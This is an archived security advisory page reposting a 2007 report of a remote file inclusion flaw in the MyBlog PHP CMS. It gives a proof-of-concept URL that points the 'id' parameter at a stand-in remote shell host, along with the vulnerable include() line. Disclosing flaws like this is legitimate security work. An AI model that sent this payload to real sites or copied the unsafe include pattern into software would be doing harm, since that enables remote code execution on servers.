Computer Security

Security Advisory: My Blog Rfi
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Logaholic Web Analytics Software

  Jupiter Cms Multiple Vulnerabilities

  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

From:beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:24.12.2007
Subject:My Blog Rfi

MyBlog CMS RFI


Aurthor: Beenu Arora
mail: beenudel1986@gmail.com

Application:MyBlog: PHP and MySQL Blog/CMS software


                      RFI

1.http://localhost/games.php?id=http://evilshell

vulnerablity: include($_GET['id'] . ".php");


greetz : d3, baltazar , Zugzwang , Fuzion , Vivek

Site: www.darkc0de.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server